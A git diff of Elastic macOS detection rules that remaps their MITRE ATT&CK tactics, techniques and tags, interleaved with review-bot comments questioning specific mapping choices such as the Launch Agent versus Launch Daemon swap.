a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index 03218b38b18..dca693e0d11 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml 
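Review bot: Two rules in this patch now disagree on how "script then network connection" maps to C2: this one moves from `T1105` to the parent `T1071`, while the installer-package rule moves from `T1071.001` to `T1105`. If the distinction is intentional (generic beaconing here, tool download there), a line in each description saying so would keep the next mapping cleanup from flipping them back; if not, pick one technique for both. Leaving `T1071` without a subtechnique is only right if the query does not constrain ports or protocols, and that query sits outside this hunk.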
+++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,28 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml index 99c96e54eed..be7f92e752a 100644 --- a/rules/macos/execution_unusual_library_load_via_python.toml +++ b/rules/macos/execution_unusual_library_load_via_python.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -82,17 +82,12 @@ library where host.os.type == "macos" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" - [[rule.threat.technique]] - name = "Command and Scripting Interpreter" - id = "T1059" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index b89f017f619..a5996a567c2 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,14 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
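Review bot: Swapping `T1059.006` (Python) for `T1129` (Shared Modules) drops the interpreter context that the rule name and the `library where ... event.action == "load"` query are built around; Shared Modules is usually reserved for loader-driven execution rather than a scripting interpreter loading a library. Consider keeping both by restoring the `T1059` technique with the `T1059.006` subtechnique next to `T1129`, or state in the description why Python is no longer the focus. The query this hunk references starts before the hunk.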
@@ -164,19 +157,43 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index 23775e46154..15870020bd0 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml 
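Review bot: The Initial Access entry (`T1566.001`, Spearphishing Attachment) is removed outright rather than supplemented, yet a suspicious child of an Office process is the canonical post-attachment signal, so coverage views will no longer show this rule against Initial Access at all. Recommend keeping a second `[[rule.threat]]` with `id = "TA0001"` and the `T1566.001` subtechnique beside the new Execution entry, and restoring `"Tactic: Initial Access"` to `tags`; the file is still named `initial_access_suspicious_mac_ms_office_child_process.toml`. The added T1059.002/.004/.006, T1203 and T1204.002 mappings are appropriate for a child-process rule and can stay as they are.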
@@ -2,7 +2,7 @@ creation_date = "2020/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,36 +103,36 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = "https://attack.mitre.org/techniques/T1550/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 5d7922d88c6..6244c0b65f5 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,14 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,19 +94,13 @@ The `systemsetup` command in macOS is a utility that allows administrators to co [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml index e96f7b9451c..e07d5fce074 100644 --- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml +++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml 
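Review bot: The rewritten `tags` array is collapsed onto one line, while the removed form and the rest of this rule's TOML keep one tag per line; if the repo's rule formatter re-expands arrays this will churn on the next normalize, so prefer keeping the multi-line layout, e.g. `tags = [` / `"Domain: Endpoint",` … one entry per line. The same collapse appears in the other rule files of this commit. Separately, the file is still named `lateral_movement_remote_ssh_login_enabled.toml` although the rule now carries only `Tactic: Persistence` and T1133; a rename is outside this hunk but worth tracking so the path does not contradict the mapping.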
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,15 +19,7 @@ name = "Suspicious Curl to Jamf Endpoint" risk_score = 73 rule_id = "a8256685-9736-465b-b159-f25a172d08e8" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -78,25 +70,12 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Lateral Movement" - id = "TA0008" - reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat.technique]] +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "Software Deployment Tools" - id = "T1072" - reference = "https://attack.mitre.org/techniques/T1072/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index 448fb9b9bff..94da2795aeb 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml 
+++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,14 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,14 +98,13 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index 8ffa3621827..e871422d1c8 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -98,19 +91,31 @@ In macOS environments, the `dscl` command-line utility manages directory service [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.001" +name = "Local Account" +reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - 
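Review bot: The new Defense Evasion entry stops at the T1564 parent, although ATT&CK has a sub-technique that matches this rule's subject directly — T1564.002 Hidden Users covers accounts hidden from the login window, which is what the `dscl`-based hiding in the description line refers to. Adding it keeps the mapping as specific as the T1136.001 entry in the same hunk. The rule's query is outside the hunk, so confirm it is limited to hiding an account before narrowing the mapping.
```toml
reference = "https://attack.mitre.org/techniques/T1564/"

[[rule.threat.technique.subtechnique]]
id = "T1564.002"
name = "Hidden Users"
reference = "https://attack.mitre.org/techniques/T1564/002/"
# … unchanged: Defense Evasion tactic block and the Persistence threat entry …
```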
diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml index 4e7a49b2daa..22c83563e54 100644 --- a/rules/macos/persistence_apple_mail_rule_modification.toml +++ b/rules/macos/persistence_apple_mail_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,25 +81,12 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" - - [[rule.threat.technique]] - name = "User Execution" - id = "T1204" - reference = "https://attack.mitre.org/techniques/T1204/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_creation_change_launch_agents_file.toml b/rules/macos/persistence_creation_change_launch_agents_file.toml index 25970d8647b..7ad252a6bd9 100644 --- a/rules/macos/persistence_creation_change_launch_agents_file.toml +++ b/rules/macos/persistence_creation_change_launch_agents_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
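Review bot: The Execution `[[rule.threat]]` entry (T1204 User Execution) is dropped from the Apple Mail rule, but no hunk in this file section touches the rule's `tags`; if the tag list still carries `Tactic: Execution`, it becomes an orphan tag that a tactic/tag consistency test (if one is enforced) would report. The other rules in this commit that drop a tactic — the Jamf and login-item rules, for instance — rewrite `tags` in the same change, so please confirm this file's list reads `"Tactic: Persistence"` only. The tags line sits outside the visible hunks.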
@@ -100,19 +100,18 @@ Launch Agents in macOS are used to execute scripts or applications automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_creation_hidden_login_item_osascript.toml b/rules/macos/persistence_creation_hidden_login_item_osascript.toml index 1dd6607c7eb..ac0eaca6c1d 100644 --- a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,15 +43,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
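Review bot: The sub-technique is switched from T1543.001 Launch Agent to T1543.004 Launch Daemon, yet this rule is about Launch Agents — both the file name and the description line in the hunk header say so — so the new mapping looks inverted. Restore `id = "T1543.001"`, `name = "Launch Agent"`, `reference = "https://attack.mitre.org/techniques/T1543/001/"`, or list both sub-techniques as the hidden launch agent/daemon process rule in this commit does, if the query also watches LaunchDaemons paths. The query is outside the hunk, so I cannot tell which paths it covers.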
@@ -97,43 +89,18 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.015" +name = "Login Items" +reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 15e61637816..018ccfaa192 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -48,14 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,19 +96,26 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.002" -name = "Authentication Package" -reference = "https://attack.mitre.org/techniques/T1547/002/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 7be128e76cb..3f1779cb36f 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml 
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,30 +81,30 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell Configuration Modification" - id = "T1546.004" - reference = "https://attack.mitre.org/techniques/T1546/004/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 1feff70a4d6..67553e9d6fd 100644 
--- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,36 +103,41 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" 
diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 60cccae6d72..42daa3071bf 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 5e06d5edddf..bd1836e5468 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
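Review bot: T1547.009 Shortcut Modification is, as far as I recall, scoped to Windows shortcut (.lnk) files in ATT&CK, so attaching it to a macOS Dock plist rule may misrepresent coverage or trip a platform check; please verify the sub-technique's platform list before merging. If it is Windows-only, keeping the T1547 parent alone is the safe mapping — drop the `[[rule.threat.technique.subtechnique]]` block for `T1547.009` and leave `id = "T1547"` / `name = "Boot or Logon Autostart Execution"` in place.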
